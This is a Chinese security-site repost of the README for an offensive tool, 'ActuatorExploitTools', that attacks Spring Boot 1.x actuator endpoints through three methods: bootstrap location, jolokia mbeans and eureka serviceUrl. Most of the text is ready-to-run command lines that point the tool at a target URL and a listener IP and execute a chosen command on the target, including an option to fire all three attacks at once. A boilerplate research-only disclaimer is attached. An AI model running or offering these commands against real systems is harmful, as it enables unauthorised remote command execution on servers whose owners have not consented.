ActuatorExploit工具

admin
admin
admin
139940
文章
114
评论
2020年8月22日10:51:57评论303 views字数 764阅读2分32秒阅读模式

ActuatorExploit工具

ActuatorExploit工具 一款用于攻击spring boot actuator的集成环境,目前集成三种攻击方式,仅支持攻击spring boot 1.x

  • spring cloud bootstrap location
  • jolokia mbeans
  • eureka serviceUrl

工具需要在与目标网络连通的机器上运行,支持交互式攻击和选择Exp自动攻击,交互式攻击适用于众测VPN场景
直接运行即可看到工具说明


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar


交互式攻击:


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc


选择Exp攻击:


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e JolokiaMbean


或者你不想选,可以直接-e All,将会用三种方式攻击


java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e All


自动攻击,对于修改配置的攻击方式会在攻击完成时还原配置,默认还原为空,暂不支持自定义参数

文章来源:
https://github.com/r00tuser111/ActuatorExploitTools

ActuatorExploit工具


推荐文章++++

ActuatorExploit工具

*隐私安全 - 2020五大安全通讯工具

*Weblogic弱密码批量检测工具

*快速收集子域名工具


ActuatorExploit工具

ActuatorExploit工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月22日10:51:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ActuatorExploit工具https://cn-sec.com/archives/99330.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息